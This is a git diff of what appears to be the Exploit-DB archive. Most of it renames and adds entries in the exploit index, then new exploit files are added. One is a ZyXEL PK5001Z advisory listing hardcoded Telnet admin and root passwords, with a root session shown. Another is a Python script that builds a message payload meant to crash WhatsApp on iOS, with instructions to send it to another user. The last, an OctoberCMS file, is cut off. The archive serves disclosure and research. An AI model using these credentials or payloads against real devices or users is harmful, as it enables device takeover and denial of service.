Traversal",2006-12-27,KAPDA,asp,webapps,0 @@ -31501,7 +31504,7 @@ id,file,description,date,author,platform,type,port 29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0 -29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0 +29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass",2007-03-19,"Chris Travers",cgi,webapps,0 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 - String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 - 'profile.php?showuser' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps,0 @@ -31808,8 +31811,8 @@ id,file,description,date,author,platform,type,port 30316,platforms/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - 'Philboard_forum.asp' SQL Injection",2007-07-17,GeFORC3,asp,webapps,0 30317,platforms/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,php,webapps,0 30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0 -30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30320,platforms/php/webapps/30320.txt,"GeoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 +30321,platforms/php/webapps/30321.txt,"GeoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - '/install/upgrade-0-2-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - '/install/upgrade-0-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - '/wp-admin/page-new.php?popuptitle' Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 @@ -31985,7 +31988,7 @@ id,file,description,date,author,platform,type,port 30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.12 - 'referer' Cross-Site Scripting",2007-09-17,L4teral,php,webapps,0 30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Local File Inclusion",2007-09-17,L4teral,php,webapps,0 30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - 'hilfe.php' Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0 -30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0 +30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - 'RC' Cross-Site Scripting",2007-09-19,azizov,cgi,webapps,0 30598,platforms/cgi/webapps/30598.txt,"WebBatch - 'webbatch.exe' URL Cross-Site Scripting",2007-09-20,Doz,cgi,webapps,0 30599,platforms/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe?dumpinputdata' Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 30601,platforms/php/webapps/30601.txt,"Vigile CMS 1.8 Wiki Module - Cross-Site Scripting Multiple Vulnerabilities",2007-09-20,x0kster,php,webapps,0 @@ -32379,7 +32382,7 @@ id,file,description,date,author,platform,type,port 32245,platforms/php/webapps/32245.txt,"Nortel Networks SRG V16 - 'modules.php?module' Cross-Site Scripting",2008-08-13,CraCkEr,php,webapps,0 32246,platforms/php/webapps/32246.txt,"Nortel Networks SRG V16 - 'admin_modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 32247,platforms/php/webapps/32247.txt,"Nortel Networks SRG V16 - 'modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps,0 -31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0 +31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Password Reset)",2014-01-27,"David Um",windows,webapps,0 31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' SQL Injection",2008-02-19,S@BUN,php,webapps,0 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0 31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' SQL Injection",2008-02-18,S@BUN,php,webapps,0 @@ -32830,7 +32833,7 @@ id,file,description,date,author,platform,type,port 31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Cross-Site Scripting",2008-06-10,Unohope,cgi,webapps,0 31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP - Cross-Site Scripting Multiple Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0 31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80 -31896,platforms/ios/webapps/31896.txt,"WiFiles HD 1.3 iOS - Locla File Inclusion",2014-02-25,Vulnerability-Lab,ios,webapps,8080 +31896,platforms/ios/webapps/31896.txt,"WiFiles HD 1.3 iOS - Local File Inclusion",2014-02-25,Vulnerability-Lab,ios,webapps,8080 31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection",2014-02-25,Hurley,php,webapps,80 31900,platforms/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps,0 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0 @@ -32865,7 +32868,7 @@ id,file,description,date,author,platform,type,port 31962,platforms/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 32135,platforms/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 -32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 +32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php?id' SQL Injection",2014-02-28,HauntIT,php,webapps,80 @@ -33208,7 +33211,7 @@ id,file,description,date,author,platform,type,port 32537,platforms/php/webapps/32537.txt,"All In One 1.4 Control Panel - 'cp_polls_results.php' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 32538,platforms/php/webapps/32538.txt,"PHP-Nuke Nuke League Module - 'tid' Cross-Site Scripting",2008-10-28,Ehsan_Hp200,php,webapps,0 32539,platforms/php/webapps/32539.html,"Microsoft Internet Explorer 6 - '&NBSP;' Address Bar URI Spoofing",2008-10-27,"Amit Klein",php,webapps,0 -32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass Vulnerabilities",2008-10-28,StAkeR,php,webapps,0 +32540,platforms/php/webapps/32540.pl,"H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass",2008-10-28,StAkeR,php,webapps,0 32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,php,webapps,0 32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 - 'view.php' SQL Injection",2008-10-28,G4N0K,php,webapps,0 32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 - 'search.php' Cross-Site Scripting",2008-10-28,cize0f,php,webapps,0 @@ -33233,7 +33236,7 @@ id,file,description,date,author,platform,type,port 32571,platforms/php/webapps/32571.txt,"TurnkeyForms Software Directory 1.0 - SQL Injection / Cross-Site Scripting",2008-11-07,G4N0K,php,webapps,0 32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps,0 32575,platforms/php/webapps/32575.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (2)",2008-11-08,G4N0K,php,webapps,0 -32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0 +32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting / HTML Injection",2008-11-10,"Francesco Bianchino",multiple,webapps,0 32577,platforms/asp/webapps/32577.txt,"Dizi Portali - 'film.asp' SQL Injection",2008-11-10,"Kaan KAMIS",asp,webapps,0 32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0 32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",asp,webapps,0 @@ -33729,7 +33732,7 @@ id,file,description,date,author,platform,type,port 33510,platforms/php/webapps/33510.txt,"Tribisur - 'cat' Cross-Site Scripting",2010-01-13,ViRuSMaN,php,webapps,0 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injections",2010-01-14,"nGenuity Information Services",multiple,webapps,0 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injections",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 -33646,platforms/php/webapps/33646.txt,"Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 +33646,platforms/php/webapps/33646.txt,"Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting",2009-12-31,"Jeff Channell",php,webapps,0 33518,platforms/hardware/webapps/33518.txt,"ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0 @@ -34293,7 +34296,7 @@ id,file,description,date,author,platform,type,port 34518,platforms/jsp/webapps/34518.txt,"ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 34524,platforms/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 -34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 +34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",multiple,webapps,0 34637,platforms/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0 34684,platforms/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,php,webapps,0 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",php,webapps,0 @@ -35063,7 +35066,7 @@ id,file,description,date,author,platform,type,port 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Cross-Site Scripting Multiple Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35730,platforms/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 -35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 +35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Cross-Site Scripting Multiple Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injections",2011-05-10,"High-Tech Bridge SA",php,webapps,0 @@ -35865,7 +35868,7 @@ id,file,description,date,author,platform,type,port 36975,platforms/php/webapps/36975.txt,"ClassifiedsGeek.com Vacation Packages - 'listing_search' SQL Injection",2012-03-19,r45c4l,php,webapps,0 36976,platforms/cgi/webapps/36976.txt,"WebGlimpse 2.x - 'wgarcmin.cgi' Full Path Disclosure",2012-03-18,Websecurity,cgi,webapps,0 36977,platforms/php/webapps/36977.pl,"CreateVision CMS - 'id' SQL Injection",2012-03-11,"Zwierzchowski Oskar",php,webapps,0 -36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Config Download",2015-05-11,"Daniel Cisa",hardware,webapps,0 +36978,platforms/hardware/webapps/36978.txt,"ZTE F660 - Remote Configuration Download",2015-05-11,"Daniel Cisa",hardware,webapps,0 36979,platforms/php/webapps/36979.sh,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0 37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps,0 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0 @@ -36102,8 +36105,8 @@ id,file,description,date,author,platform,type,port 37296,platforms/php/webapps/37296.txt,"Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery",2015-06-16,"Jerold Hoong",php,webapps,0 37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0 37318,platforms/php/webapps/37318.txt,"phpList 2.10.9 - 'Sajax.php' PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 -37319,platforms/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 -37320,platforms/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0 +37319,platforms/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex HeapSpray",2015-06-19,metacom,windows,webapps,0 +37320,platforms/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex HeapSpray",2015-06-19,metacom,windows,webapps,0 37321,platforms/php/webapps/37321.txt,"DynPage 1.0 - 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0 37322,platforms/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,multiple,webapps,0 37323,platforms/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete",2015-06-19,Vulnerability-Lab,hardware,webapps,0 @@ -36395,7 +36398,7 @@ id,file,description,date,author,platform,type,port 37779,platforms/php/webapps/37779.txt,"Flogr - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",php,webapps,0 37781,platforms/php/webapps/37781.txt,"Extcalendar 2.0 - Multiple SQL Injections / HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps,0 37782,platforms/php/webapps/37782.txt,"web@all - Local File Inclusion / Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps,0 -37784,platforms/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0 +37784,platforms/php/webapps/37784.txt,"Pinterestclones - Security Bypass / HTML Injection",2012-09-08,DaOne,php,webapps,0 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite - Multiple SQL Injections",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 37786,platforms/php/webapps/37786.txt,"DELTAScripts PHP Links - Multiple SQL Injections",2012-09-10,L0n3ly-H34rT,php,webapps,0 37787,platforms/php/webapps/37787.txt,"WordPress Plugin Download Monitor - 'dlsearch' Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 @@ -36679,7 +36682,7 @@ id,file,description,date,author,platform,type,port 38374,platforms/php/webapps/38374.txt,"SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 38376,platforms/php/webapps/38376.txt,"WordPress Plugin podPress - 'playerID' Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 -38377,platforms/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 +38377,platforms/php/webapps/38377.txt,"Privoxy Proxy - Authentication Information Disclosure",2013-03-11,"Chris John Riley",php,webapps,0 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - Cross-Site Request Forgery",2015-10-02,hyp3rlinx,windows,webapps,0 38383,platforms/linux/webapps/38383.py,"ElasticSearch 1.6.0 - Arbitrary File Download",2015-10-02,"Pedro Andujar",linux,webapps,9200 @@ -36693,7 +36696,7 @@ id,file,description,date,author,platform,type,port 38406,platforms/php/webapps/38406.txt,"PHP-Fusion 7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 -38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Config Disclosure",2015-10-06,"Todor Donev",hardware,webapps,0 +38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Router - Unauthenticated Configuration Disclosure",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Cross-Site Scripting Multiple Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 @@ -36827,7 +36830,7 @@ id,file,description,date,author,platform,type,port 38648,platforms/php/webapps/38648.txt,"WordPress Plugin My Calendar 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0 38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0 38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps,0 -38652,platforms/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0 +38652,platforms/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection",2015-11-07,"Dawid Golunski",php,webapps,0 38653,platforms/asp/webapps/38653.txt,"Corda Highwire - 'Highwire.ashx' Full Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0 38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 @@ -36910,7 +36913,7 @@ id,file,description,date,author,platform,type,port 38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2/0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 38828,platforms/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0 38830,platforms/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",php,webapps,80 -38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Access (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0 +38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Web Interface Arbitrary File Access (",2015-12-01,"Machiel Pronk",linux,webapps,0 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0 @@ -36954,7 +36957,7 @@ id,file,description,date,author,platform,type,port 38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0 38895,platforms/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80 -38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0 +38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0 38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,xml,webapps,0 38898,platforms/xml/webapps/38898.txt,"OpenMRS 2.3 (1.11.4) - Cross-Site Scripting Multiple Vulnerabilities",2015-12-08,LiquidWorm,xml,webapps,0 38899,platforms/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,xml,webapps,0 @@ -38797,3 +38800,5 @@ id,file,description,date,author,platform,type,port 43101,platforms/php/webapps/43101.txt,"D-Park Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0 43102,platforms/php/webapps/43102.txt,"Ingenious 2.3.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0 43103,platforms/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,xml,webapps,0 +43106,platforms/php/webapps/43106.txt,"OctoberCMS 1.0.426 (Build 426) - Cross-Site Request Forgery",2017-11-01,"Zain Sabahat",php,webapps,0 +43108,platforms/php/webapps/43108.txt,"Ingenious School Management System 2.3.0 - 'friend_index' SQL injection",2017-11-01,"Giulio Comi",php,webapps,0 diff --git a/platforms/hardware/remote/43105.txt b/platforms/hardware/remote/43105.txt new file mode 100755 index 000000000..bb96c9f2d --- /dev/null +++ b/platforms/hardware/remote/43105.txt @@ -0,0 +1,41 @@ +# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. +# Google Dork: n/a +# Date: 2017-10-31 +# Exploit Author: Matthew Sheimo +# Vendor Homepage: https://www.zyxel.com/ +# Software Link: n/a +# Version: PK5001Z 2.6.20.19 +# Tested on: Linux +# About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world. +# Linked CVE's: CVE-2016-10401 + + +Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet + +username: admin +password: CenturyL1nk + +Escalate to root with 'su' and this password. + +password: zyad5001 + + +[root:/]# telnet 192.168.0.1 +Trying 192.168.0.1... +Connected to 192.168.0.1. +Escape character is '^]'. + +PK5001Z login: admin +Password: CenturyL1nk +$ whoami +admin_404A03Tel +$ su +Password: zyad5001 +# whoami +root +# uname -a +Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown +# cat /etc/zyfwinfo +Vendor Name: ZyXEL Communications Corp. + + diff --git a/platforms/ios/dos/43107.py b/platforms/ios/dos/43107.py new file mode 100755 index 000000000..3f2ff94d6 --- /dev/null +++ b/platforms/ios/dos/43107.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Found this and more exploits on my open source security project: http://www.exploitpack.com +# Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com +# Date and time of release: 11 October 2017 +# +# Tested on: iPhone 5/6s iOS 10.3.3 and 11 +# +# Description: +# WhatsApp 2.17.52 and prior is prone to a remote memory corruption. +# This type of attacks are possible if the program uses memory inefficiently and does not impose limits on the amount of state used when necessary. +# +# Impact: +# Resource exhaustion attacks exploit a design deficiency. An attacker could exploit this vulnerability to remotely corrupt the memory of the application forcing an uhandled exception +# in the context of the application that could potentially result in a denial-of-service condition and/or remote memory corruption. +# +# Warning note: +# Once a user receives the offending message it will automatically crash the application and if its restarted it will crash again until the message its manually removed from the user's history. +# +# Timeline: +# 09/13/2017 - Research started +# 09/13/2017 - First proof of concept +# 09/15/2017 - Reported to Whatsapp +# 09/20/2017 - Report Triaged by Facebook +# 11/01/2017 - Facebook never replied back with a status fix +# 11/01/2017 - Disclosure as zero day +# Vendor homepage: http://www.whatsapp.com +import sys +reload(sys) + +def whatsapp(filename): + sys.setdefaultencoding("utf-8") + payload = u'ب ة ت ث ج ح خ د ذ ر ز س ش ص ض ط ظ ع غ ف ق ك ل م ن' * 1337 + sutf8 = payload.encode('UTF-8') + print "[*] Writing to file: " + filename + open(filename, 'w').write(payload) + print "[*] Done." + +def howtouse(): + print "Usage: whatsapp.py [FILENAME]" + print "[*] Mandatory arguments:" + print "[-] FILENAME" + sys.exit(-1) + +if __name__ == "__main__": + try: + print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by Juan Sacco" + print "[*] How to use: Copy the content of the file and send it as a message to another whatsapp user or group" + whatsapp(sys.argv[1]) + except IndexError: + howtouse() \ No newline at end of file diff --git a/platforms/php/webapps/43106.txt b/platforms/php/webapps/43106.txt new file mode 100755 index 000000000..b1bea002c --- /dev/null +++ b/platforms/php/webapps/43106.txt @@ -0,0 +1,49 @@ +# Exploit Title: OctoberCMS 1.0.426 - 